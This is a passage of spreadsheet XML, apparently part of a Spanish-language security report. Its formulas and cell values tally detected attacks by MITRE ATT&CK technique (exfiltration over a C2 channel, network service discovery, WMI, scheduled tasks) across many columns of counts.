      <c r="BE13" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF13" s="12">
        <v>0</v>
      </c>
      <c r="BG13" s="13">
        <v>0</v>
      </c>
      <c r="BH13" s="394">
        <v>0</v>
      </c>
      <c r="BI13" s="292">
        <v>0</v>
      </c>
      <c r="BJ13" s="322">
        <v>0</v>
      </c>
      <c r="BK13" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL13" s="12">
        <v>0</v>
      </c>
      <c r="BM13" s="13">
        <v>0</v>
      </c>
      <c r="BN13" s="394">
        <v>0</v>
      </c>
      <c r="BO13" s="292">
        <v>3</v>
      </c>
      <c r="BP13" s="322">
        <v>3</v>
      </c>
      <c r="BQ13" s="322" t="str">
        <f t="shared" si="10"/>
        <v>3 (3)</v>
      </c>
      <c r="BR13" s="12">
        <v>0</v>
      </c>
      <c r="BS13" s="12">
        <v>3</v>
      </c>
      <c r="BT13" s="13">
        <v>1</v>
      </c>
      <c r="BU13" s="394">
        <v>1</v>
      </c>
      <c r="BV13" s="292">
        <v>0</v>
      </c>
      <c r="BW13" s="322">
        <v>0</v>
      </c>
      <c r="BX13" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY13" s="12">
        <v>0</v>
      </c>
      <c r="BZ13" s="13">
        <v>0</v>
      </c>
      <c r="CA13" s="394">
        <v>0</v>
      </c>
      <c r="CB13" s="292">
        <v>0</v>
      </c>
      <c r="CC13" s="322">
        <v>0</v>
      </c>
      <c r="CD13" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE13" s="12">
        <v>0</v>
      </c>
      <c r="CF13" s="12">
        <v>0</v>
      </c>
      <c r="CG13" s="13">
        <v>0</v>
      </c>
      <c r="CH13" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:93" ht="15" customHeight="1">
      <c r="A14" s="4">
        <f t="shared" si="13"/>
        <v>12</v>
      </c>
      <c r="B14" s="4" t="str">
        <f>IFERROR(VLOOKUP(A14,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1041</v>
      </c>
      <c r="C14" s="493" t="str">
        <f>IFERROR(VLOOKUP(B14,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exfiltration Over C2 Channel</v>
      </c>
      <c r="D14" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B14)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E14" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F14" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (2)</v>
      </c>
      <c r="G14" s="292">
        <v>0</v>
      </c>
      <c r="H14" s="322">
        <v>0</v>
      </c>
      <c r="I14" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J14" s="12">
        <v>0</v>
      </c>
      <c r="K14" s="13">
        <v>0</v>
      </c>
      <c r="L14" s="394">
        <v>0</v>
      </c>
      <c r="M14" s="322">
        <v>5</v>
      </c>
      <c r="N14" s="322">
        <v>1</v>
      </c>
      <c r="O14" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (5)</v>
      </c>
      <c r="P14" s="12">
        <v>1</v>
      </c>
      <c r="Q14" s="13">
        <v>1</v>
      </c>
      <c r="R14" s="394">
        <v>1</v>
      </c>
      <c r="S14" s="409">
        <v>5</v>
      </c>
      <c r="T14" s="4">
        <v>1</v>
      </c>
      <c r="U14" s="322" t="str">
        <f t="shared" si="2"/>
        <v>1 (5)</v>
      </c>
      <c r="V14" s="4">
        <v>1</v>
      </c>
      <c r="W14" s="13">
        <v>1</v>
      </c>
      <c r="X14" s="394">
        <v>1</v>
      </c>
      <c r="Y14" s="392">
        <v>6</v>
      </c>
      <c r="Z14" s="392">
        <v>2</v>
      </c>
      <c r="AA14" s="322" t="str">
        <f t="shared" si="3"/>
        <v>2 (6)</v>
      </c>
      <c r="AB14" s="392">
        <v>1</v>
      </c>
      <c r="AC14" s="16">
        <v>1</v>
      </c>
      <c r="AD14" s="394">
        <v>2</v>
      </c>
      <c r="AE14" s="392">
        <v>11</v>
      </c>
      <c r="AF14" s="392">
        <v>3</v>
      </c>
      <c r="AG14" s="322" t="str">
        <f t="shared" si="4"/>
        <v>3 (11)</v>
      </c>
      <c r="AH14" s="392">
        <v>2</v>
      </c>
      <c r="AI14" s="16">
        <v>1</v>
      </c>
      <c r="AJ14" s="394">
        <v>2</v>
      </c>
      <c r="AK14" s="392">
        <v>17</v>
      </c>
      <c r="AL14" s="392">
        <v>5</v>
      </c>
      <c r="AM14" s="322" t="str">
        <f t="shared" si="5"/>
        <v>5 (17)</v>
      </c>
      <c r="AN14" s="392">
        <v>3</v>
      </c>
      <c r="AO14" s="16">
        <v>1</v>
      </c>
      <c r="AP14" s="394">
        <v>2</v>
      </c>
      <c r="AQ14" s="292">
        <v>0</v>
      </c>
      <c r="AR14" s="322">
        <v>0</v>
      </c>
      <c r="AS14" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT14" s="12">
        <v>0</v>
      </c>
      <c r="AU14" s="13">
        <v>0</v>
      </c>
      <c r="AV14" s="394">
        <v>0</v>
      </c>
      <c r="AW14" s="392">
        <v>0</v>
      </c>
      <c r="AX14" s="392">
        <v>0</v>
      </c>
      <c r="AY14" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ14" s="4">
        <v>0</v>
      </c>
      <c r="BA14" s="16">
        <v>0</v>
      </c>
      <c r="BB14" s="394">
        <v>0</v>
      </c>
      <c r="BC14" s="292">
        <v>5</v>
      </c>
      <c r="BD14" s="322">
        <v>1</v>
      </c>
      <c r="BE14" s="322" t="str">
        <f t="shared" si="8"/>
        <v>1 (5)</v>
      </c>
      <c r="BF14" s="12">
        <v>1</v>
      </c>
      <c r="BG14" s="13">
        <v>1</v>
      </c>
      <c r="BH14" s="394">
        <v>1</v>
      </c>
      <c r="BI14" s="292">
        <v>0</v>
      </c>
      <c r="BJ14" s="322">
        <v>0</v>
      </c>
      <c r="BK14" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL14" s="12">
        <v>0</v>
      </c>
      <c r="BM14" s="13">
        <v>0</v>
      </c>
      <c r="BN14" s="394">
        <v>0</v>
      </c>
      <c r="BO14" s="292">
        <v>1</v>
      </c>
      <c r="BP14" s="322">
        <v>1</v>
      </c>
      <c r="BQ14" s="322" t="str">
        <f t="shared" si="10"/>
        <v>1 (1)</v>
      </c>
      <c r="BR14" s="12">
        <v>0</v>
      </c>
      <c r="BS14" s="12">
        <v>1</v>
      </c>
      <c r="BT14" s="13">
        <v>1</v>
      </c>
      <c r="BU14" s="394">
        <v>1</v>
      </c>
      <c r="BV14" s="292">
        <v>0</v>
      </c>
      <c r="BW14" s="322">
        <v>0</v>
      </c>
      <c r="BX14" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY14" s="12">
        <v>0</v>
      </c>
      <c r="BZ14" s="13">
        <v>0</v>
      </c>
      <c r="CA14" s="394">
        <v>0</v>
      </c>
      <c r="CB14" s="292">
        <v>0</v>
      </c>
      <c r="CC14" s="322">
        <v>0</v>
      </c>
      <c r="CD14" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE14" s="12">
        <v>0</v>
      </c>
      <c r="CF14" s="12">
        <v>0</v>
      </c>
      <c r="CG14" s="13">
        <v>0</v>
      </c>
      <c r="CH14" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="15" spans="1:93" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A15" s="4">
        <f t="shared" si="13"/>
        <v>13</v>
      </c>
      <c r="B15" s="4" t="str">
        <f>IFERROR(VLOOKUP(A15,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1046</v>
      </c>
      <c r="C15" s="493" t="str">
        <f>IFERROR(VLOOKUP(B15,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Network Service Discovery</v>
      </c>
      <c r="D15" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B15)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>3</v>
      </c>
      <c r="E15" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>65846</v>
      </c>
      <c r="F15" s="579" t="str">
        <f t="shared" si="14"/>
        <v>3 (65846)</v>
      </c>
      <c r="G15" s="292">
        <v>79</v>
      </c>
      <c r="H15" s="322">
        <v>30</v>
      </c>
      <c r="I15" s="322" t="str">
        <f t="shared" si="0"/>
        <v>30 (79)</v>
      </c>
      <c r="J15" s="12">
        <v>4</v>
      </c>
      <c r="K15" s="13">
        <v>0.33333333333333331</v>
      </c>
      <c r="L15" s="394">
        <v>30</v>
      </c>
      <c r="M15" s="322">
        <v>464</v>
      </c>
      <c r="N15" s="322">
        <v>134</v>
      </c>
      <c r="O15" s="322" t="str">
        <f t="shared" si="1"/>
        <v>134 (464)</v>
      </c>
      <c r="P15" s="12">
        <v>68</v>
      </c>
      <c r="Q15" s="13">
        <v>1</v>
      </c>
      <c r="R15" s="394">
        <v>62</v>
      </c>
      <c r="S15" s="409">
        <v>543</v>
      </c>
      <c r="T15" s="4">
        <v>164</v>
      </c>
      <c r="U15" s="322" t="str">
        <f t="shared" si="2"/>
        <v>164 (543)</v>
      </c>
      <c r="V15" s="4">
        <v>72</v>
      </c>
      <c r="W15" s="13">
        <v>1</v>
      </c>
      <c r="X15" s="394">
        <v>67</v>
      </c>
      <c r="Y15" s="392">
        <v>7878</v>
      </c>
      <c r="Z15" s="392">
        <v>488</v>
      </c>
      <c r="AA15" s="322" t="str">
        <f t="shared" si="3"/>
        <v>488 (7878)</v>
      </c>
      <c r="AB15" s="392">
        <v>125</v>
      </c>
      <c r="AC15" s="16">
        <v>1</v>
      </c>
      <c r="AD15" s="394">
        <v>163</v>
      </c>
      <c r="AE15" s="392">
        <v>3284</v>
      </c>
      <c r="AF15" s="392">
        <v>442</v>
      </c>
      <c r="AG15" s="322" t="str">
        <f t="shared" si="4"/>
        <v>442 (3284)</v>
      </c>
      <c r="AH15" s="392">
        <v>254</v>
      </c>
      <c r="AI15" s="16">
        <v>1</v>
      </c>
      <c r="AJ15" s="394">
        <v>81</v>
      </c>
      <c r="AK15" s="392">
        <v>11162</v>
      </c>
      <c r="AL15" s="392">
        <v>930</v>
      </c>
      <c r="AM15" s="322" t="str">
        <f t="shared" si="5"/>
        <v>930 (11162)</v>
      </c>
      <c r="AN15" s="392">
        <v>379</v>
      </c>
      <c r="AO15" s="16">
        <v>1</v>
      </c>
      <c r="AP15" s="394">
        <v>163</v>
      </c>
      <c r="AQ15" s="292">
        <v>0</v>
      </c>
      <c r="AR15" s="322">
        <v>0</v>
      </c>
      <c r="AS15" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT15" s="12">
        <v>0</v>
      </c>
      <c r="AU15" s="13">
        <v>0</v>
      </c>
      <c r="AV15" s="394">
        <v>0</v>
      </c>
      <c r="AW15" s="392">
        <v>938</v>
      </c>
      <c r="AX15" s="392">
        <v>127</v>
      </c>
      <c r="AY15" s="322" t="str">
        <f t="shared" si="7"/>
        <v>127 (938)</v>
      </c>
      <c r="AZ15" s="4">
        <v>54</v>
      </c>
      <c r="BA15" s="16">
        <v>0.33333333333333331</v>
      </c>
      <c r="BB15" s="394">
        <v>73</v>
      </c>
      <c r="BC15" s="292">
        <v>1481</v>
      </c>
      <c r="BD15" s="322">
        <v>291</v>
      </c>
      <c r="BE15" s="322" t="str">
        <f t="shared" si="8"/>
        <v>291 (1481)</v>
      </c>
      <c r="BF15" s="12">
        <v>126</v>
      </c>
      <c r="BG15" s="13">
        <v>1</v>
      </c>
      <c r="BH15" s="394">
        <v>91</v>
      </c>
      <c r="BI15" s="292">
        <v>209</v>
      </c>
      <c r="BJ15" s="322">
        <v>150</v>
      </c>
      <c r="BK15" s="322" t="str">
        <f t="shared" si="9"/>
        <v>150 (209)</v>
      </c>
      <c r="BL15" s="12">
        <v>47</v>
      </c>
      <c r="BM15" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="BN15" s="394">
        <v>94</v>
      </c>
      <c r="BO15" s="292">
        <v>221</v>
      </c>
      <c r="BP15" s="322">
        <v>162</v>
      </c>
      <c r="BQ15" s="322" t="str">
        <f t="shared" si="10"/>
        <v>162 (221)</v>
      </c>
      <c r="BR15" s="12">
        <v>47</v>
      </c>
      <c r="BS15" s="12">
        <v>7</v>
      </c>
      <c r="BT15" s="13">
        <v>1</v>
      </c>
      <c r="BU15" s="394">
        <v>106</v>
      </c>
      <c r="BV15" s="292">
        <v>42</v>
      </c>
      <c r="BW15" s="322">
        <v>34</v>
      </c>
      <c r="BX15" s="322" t="str">
        <f t="shared" si="11"/>
        <v>34 (42)</v>
      </c>
      <c r="BY15" s="12">
        <v>29</v>
      </c>
      <c r="BZ15" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="CA15" s="394">
        <v>25</v>
      </c>
      <c r="CB15" s="292">
        <v>5556</v>
      </c>
      <c r="CC15" s="322">
        <v>166</v>
      </c>
      <c r="CD15" s="322" t="str">
        <f t="shared" si="12"/>
        <v>166 (5556)</v>
      </c>
      <c r="CE15" s="12">
        <v>0</v>
      </c>
      <c r="CF15" s="12">
        <v>3</v>
      </c>
      <c r="CG15" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="CH15" s="394">
        <v>165</v>
      </c>
    </row>
    <row r="16" spans="1:93" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A16" s="4">
        <f t="shared" si="13"/>
        <v>14</v>
      </c>
      <c r="B16" s="4" t="str">
        <f>IFERROR(VLOOKUP(A16,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1047</v>
      </c>
      <c r="C16" s="493" t="str">
        <f>IFERROR(VLOOKUP(B16,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Windows Management Instrumentation</v>
      </c>
      <c r="D16" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B16)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E16" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>912</v>
      </c>
      <c r="F16" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (912)</v>
      </c>
      <c r="G16" s="292">
        <v>0</v>
      </c>
      <c r="H16" s="322">
        <v>0</v>
      </c>
      <c r="I16" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J16" s="12">
        <v>0</v>
      </c>
      <c r="K16" s="13">
        <v>0</v>
      </c>
      <c r="L16" s="394">
        <v>0</v>
      </c>
      <c r="M16" s="322">
        <v>459</v>
      </c>
      <c r="N16" s="322">
        <v>444</v>
      </c>
      <c r="O16" s="322" t="str">
        <f t="shared" si="1"/>
        <v>444 (459)</v>
      </c>
      <c r="P16" s="12">
        <v>4</v>
      </c>
      <c r="Q16" s="13">
        <v>1</v>
      </c>
      <c r="R16" s="394">
        <v>442</v>
      </c>
      <c r="S16" s="409">
        <v>459</v>
      </c>
      <c r="T16" s="4">
        <v>444</v>
      </c>
      <c r="U16" s="322" t="str">
        <f t="shared" si="2"/>
        <v>444 (459)</v>
      </c>
      <c r="V16" s="4">
        <v>4</v>
      </c>
      <c r="W16" s="13">
        <v>1</v>
      </c>
      <c r="X16" s="394">
        <v>442</v>
      </c>
      <c r="Y16" s="392">
        <v>946</v>
      </c>
      <c r="Z16" s="392">
        <v>899</v>
      </c>
      <c r="AA16" s="322" t="str">
        <f t="shared" si="3"/>
        <v>899 (946)</v>
      </c>
      <c r="AB16" s="392">
        <v>4</v>
      </c>
      <c r="AC16" s="16">
        <v>1</v>
      </c>
      <c r="AD16" s="394">
        <v>878</v>
      </c>
      <c r="AE16" s="392">
        <v>1371</v>
      </c>
      <c r="AF16" s="392">
        <v>1322</v>
      </c>
      <c r="AG16" s="322" t="str">
        <f t="shared" si="4"/>
        <v>1322 (1371)</v>
      </c>
      <c r="AH16" s="392">
        <v>7</v>
      </c>
      <c r="AI16" s="16">
        <v>1</v>
      </c>
      <c r="AJ16" s="394">
        <v>878</v>
      </c>
      <c r="AK16" s="392">
        <v>2317</v>
      </c>
      <c r="AL16" s="392">
        <v>2221</v>
      </c>
      <c r="AM16" s="322" t="str">
        <f t="shared" si="5"/>
        <v>2221 (2317)</v>
      </c>
      <c r="AN16" s="392">
        <v>11</v>
      </c>
      <c r="AO16" s="16">
        <v>1</v>
      </c>
      <c r="AP16" s="394">
        <v>878</v>
      </c>
      <c r="AQ16" s="292">
        <v>0</v>
      </c>
      <c r="AR16" s="322">
        <v>0</v>
      </c>
      <c r="AS16" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT16" s="12">
        <v>0</v>
      </c>
      <c r="AU16" s="13">
        <v>0</v>
      </c>
      <c r="AV16" s="394">
        <v>0</v>
      </c>
      <c r="AW16" s="392">
        <v>34</v>
      </c>
      <c r="AX16" s="392">
        <v>20</v>
      </c>
      <c r="AY16" s="322" t="str">
        <f t="shared" si="7"/>
        <v>20 (34)</v>
      </c>
      <c r="AZ16" s="4">
        <v>1</v>
      </c>
      <c r="BA16" s="16">
        <v>1</v>
      </c>
      <c r="BB16" s="394">
        <v>20</v>
      </c>
      <c r="BC16" s="292">
        <v>493</v>
      </c>
      <c r="BD16" s="322">
        <v>464</v>
      </c>
      <c r="BE16" s="322" t="str">
        <f t="shared" si="8"/>
        <v>464 (493)</v>
      </c>
      <c r="BF16" s="12">
        <v>5</v>
      </c>
      <c r="BG16" s="13">
        <v>1</v>
      </c>
      <c r="BH16" s="394">
        <v>452</v>
      </c>
      <c r="BI16" s="292">
        <v>2</v>
      </c>
      <c r="BJ16" s="322">
        <v>2</v>
      </c>
      <c r="BK16" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (2)</v>
      </c>
      <c r="BL16" s="12">
        <v>1</v>
      </c>
      <c r="BM16" s="13">
        <v>1</v>
      </c>
      <c r="BN16" s="394">
        <v>2</v>
      </c>
      <c r="BO16" s="292">
        <v>917</v>
      </c>
      <c r="BP16" s="322">
        <v>914</v>
      </c>
      <c r="BQ16" s="322" t="str">
        <f t="shared" si="10"/>
        <v>914 (917)</v>
      </c>
      <c r="BR16" s="12">
        <v>1</v>
      </c>
      <c r="BS16" s="12">
        <v>4</v>
      </c>
      <c r="BT16" s="13">
        <v>1</v>
      </c>
      <c r="BU16" s="394">
        <v>912</v>
      </c>
      <c r="BV16" s="292">
        <v>0</v>
      </c>
      <c r="BW16" s="322">
        <v>0</v>
      </c>
      <c r="BX16" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY16" s="12">
        <v>0</v>
      </c>
      <c r="BZ16" s="13">
        <v>0</v>
      </c>
      <c r="CA16" s="394">
        <v>0</v>
      </c>
      <c r="CB16" s="292">
        <v>0</v>
      </c>
      <c r="CC16" s="322">
        <v>0</v>
      </c>
      <c r="CD16" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE16" s="12">
        <v>0</v>
      </c>
      <c r="CF16" s="12">
        <v>0</v>
      </c>
      <c r="CG16" s="13">
        <v>0</v>
      </c>
      <c r="CH16" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A17" s="4">
        <f t="shared" si="13"/>
        <v>15</v>
      </c>
      <c r="B17" s="4" t="str">
        <f>IFERROR(VLOOKUP(A17,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1048</v>
      </c>
      <c r="C17" s="493" t="str">
        <f>IFERROR(VLOOKUP(B17,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exfiltration Over Alternative Protocol</v>
      </c>
      <c r="D17" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B17)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E17" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>12</v>
      </c>
      <c r="F17" s="579" t="str">
        <f t="shared" si="14"/>
        <v>2 (12)</v>
      </c>
      <c r="G17" s="292">
        <v>0</v>
      </c>
      <c r="H17" s="322">
        <v>0</v>
      </c>
      <c r="I17" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J17" s="12">
        <v>0</v>
      </c>
      <c r="K17" s="13">
        <v>0</v>
      </c>
      <c r="L17" s="394">
        <v>0</v>
      </c>
      <c r="M17" s="322">
        <v>0</v>
      </c>
      <c r="N17" s="322">
        <v>0</v>
      </c>
      <c r="O17" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P17" s="12">
        <v>0</v>
      </c>
      <c r="Q17" s="13">
        <v>0</v>
      </c>
      <c r="R17" s="394">
        <v>0</v>
      </c>
      <c r="S17" s="409">
        <v>0</v>
      </c>
      <c r="T17" s="4">
        <v>0</v>
      </c>
      <c r="U17" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V17" s="4">
        <v>0</v>
      </c>
      <c r="W17" s="13">
        <v>0</v>
      </c>
      <c r="X17" s="394">
        <v>0</v>
      </c>
      <c r="Y17" s="392">
        <v>0</v>
      </c>
      <c r="Z17" s="392">
        <v>0</v>
      </c>
      <c r="AA17" s="322" t="str">
        <f t="shared" si="3"/>
        <v>0 (0)</v>
      </c>
      <c r="AB17" s="392">
        <v>0</v>
      </c>
      <c r="AC17" s="16">
        <v>0</v>
      </c>
      <c r="AD17" s="394">
        <v>0</v>
      </c>
      <c r="AE17" s="392">
        <v>0</v>
      </c>
      <c r="AF17" s="392">
        <v>0</v>
      </c>
      <c r="AG17" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH17" s="392">
        <v>0</v>
      </c>
      <c r="AI17" s="16">
        <v>0</v>
      </c>
      <c r="AJ17" s="394">
        <v>0</v>
      </c>
      <c r="AK17" s="392">
        <v>0</v>
      </c>
      <c r="AL17" s="392">
        <v>0</v>
      </c>
      <c r="AM17" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="AN17" s="392">
        <v>0</v>
      </c>
      <c r="AO17" s="16">
        <v>0</v>
      </c>
      <c r="AP17" s="394">
        <v>0</v>
      </c>
      <c r="AQ17" s="292">
        <v>0</v>
      </c>
      <c r="AR17" s="322">
        <v>0</v>
      </c>
      <c r="AS17" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT17" s="12">
        <v>0</v>
      </c>
      <c r="AU17" s="13">
        <v>0</v>
      </c>
      <c r="AV17" s="394">
        <v>0</v>
      </c>
      <c r="AW17" s="392">
        <v>0</v>
      </c>
      <c r="AX17" s="392">
        <v>0</v>
      </c>
      <c r="AY17" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ17" s="4">
        <v>0</v>
      </c>
      <c r="BA17" s="16">
        <v>0</v>
      </c>
      <c r="BB17" s="394">
        <v>0</v>
      </c>
      <c r="BC17" s="292">
        <v>0</v>
      </c>
      <c r="BD17" s="322">
        <v>0</v>
      </c>
      <c r="BE17" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF17" s="12">
        <v>0</v>
      </c>
      <c r="BG17" s="13">
        <v>0</v>
      </c>
      <c r="BH17" s="394">
        <v>0</v>
      </c>
      <c r="BI17" s="292">
        <v>0</v>
      </c>
      <c r="BJ17" s="322">
        <v>0</v>
      </c>
      <c r="BK17" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL17" s="12">
        <v>0</v>
      </c>
      <c r="BM17" s="13">
        <v>0</v>
      </c>
      <c r="BN17" s="394">
        <v>0</v>
      </c>
      <c r="BO17" s="292">
        <v>9</v>
      </c>
      <c r="BP17" s="322">
        <v>3</v>
      </c>
      <c r="BQ17" s="322" t="str">
        <f t="shared" si="10"/>
        <v>3 (9)</v>
      </c>
      <c r="BR17" s="12">
        <v>0</v>
      </c>
      <c r="BS17" s="12">
        <v>3</v>
      </c>
      <c r="BT17" s="13">
        <v>1</v>
      </c>
      <c r="BU17" s="394">
        <v>3</v>
      </c>
      <c r="BV17" s="292">
        <v>0</v>
      </c>
      <c r="BW17" s="322">
        <v>0</v>
      </c>
      <c r="BX17" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY17" s="12">
        <v>0</v>
      </c>
      <c r="BZ17" s="13">
        <v>0</v>
      </c>
      <c r="CA17" s="394">
        <v>0</v>
      </c>
      <c r="CB17" s="292">
        <v>0</v>
      </c>
      <c r="CC17" s="322">
        <v>0</v>
      </c>
      <c r="CD17" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE17" s="12">
        <v>0</v>
      </c>
      <c r="CF17" s="12">
        <v>0</v>
      </c>
      <c r="CG17" s="13">
        <v>0</v>
      </c>
      <c r="CH17" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="18" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A18" s="4">
        <f t="shared" si="13"/>
        <v>16</v>
      </c>
      <c r="B18" s="4" t="str">
        <f>IFERROR(VLOOKUP(A18,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1053</v>
      </c>
      <c r="C18" s="493" t="str">
        <f>IFERROR(VLOOKUP(B18,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Scheduled Task/Job</v>
      </c>
      <c r="D18" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B18)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E18" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F18" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (2)</v>
      </c>
      <c r="G18" s="292">
        <v>0</v>
      </c>
      <c r="H18" s="322">
        <v>0</v>
      </c>
      <c r="I18" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J18" s="12">
        <v>0</v>
      </c>
      <c r="K18" s="13">
        <v>0</v>
      </c>
      <c r="L18" s="394">
        <v>0</v>
      </c>
      <c r="M18" s="322">
        <v>12</v>
      </c>
      <c r="N18" s="322">
        <v>2</v>
      </c>
      <c r="O18" s="322" t="str">
        <f t="shared" si="1"/>
        <v>2 (12)</v>
      </c>
      <c r="P18" s="12">
        <v>2</v>
      </c>
      <c r="Q18" s="13">
        <v>1</v>
      </c>
      <c r="R18" s="394">
        <v>2</v>
      </c>
      <c r="S18" s="409">
        <v>12</v>
      </c>
      <c r="T18" s="4">
        <v>2</v>
      </c>
      <c r="U18" s="322" t="str">
        <f t="shared" si="2"/>
        <v>2 (12)</v>
      </c>
      <c r="V18" s="4">
        <v>2</v>
      </c>
      <c r="W18" s="13">
        <v>1</v>
      </c>
      <c r="X18" s="394">
        <v>2</v>
      </c>
      <c r="Y18" s="392">
        <v>23</v>
      </c>
      <c r="Z18" s="392">
        <v>6</v>
      </c>
      <c r="AA18" s="322" t="str">
        <f t="shared" si="3"/>
        <v>6 (23)</v>
      </c>
      <c r="AB18" s="392">
        <v>5</v>
      </c>
      <c r="AC18" s="16">
        <v>1</v>
      </c>
      <c r="AD18" s="394">
        <v>2</v>
      </c>
      <c r="AE18" s="392">
        <v>26</v>
      </c>
      <c r="AF18" s="392">
        <v>5</v>
      </c>
      <c r="AG18" s="322" t="str">
        <f t="shared" si="4"/>
        <v>5 (26)</v>
      </c>
      <c r="AH18" s="392">
        <v>4</v>
      </c>
      <c r="AI18" s="16">
        <v>1</v>
      </c>
      <c r="AJ18" s="394">
        <v>2</v>
      </c>
      <c r="AK18" s="392">
        <v>49</v>
      </c>
      <c r="AL18" s="392">
        <v>11</v>
      </c>
      <c r="AM18" s="322" t="str">
        <f t="shared" si="5"/>
        <v>11 (49)</v>
      </c>
      <c r="AN18" s="392">
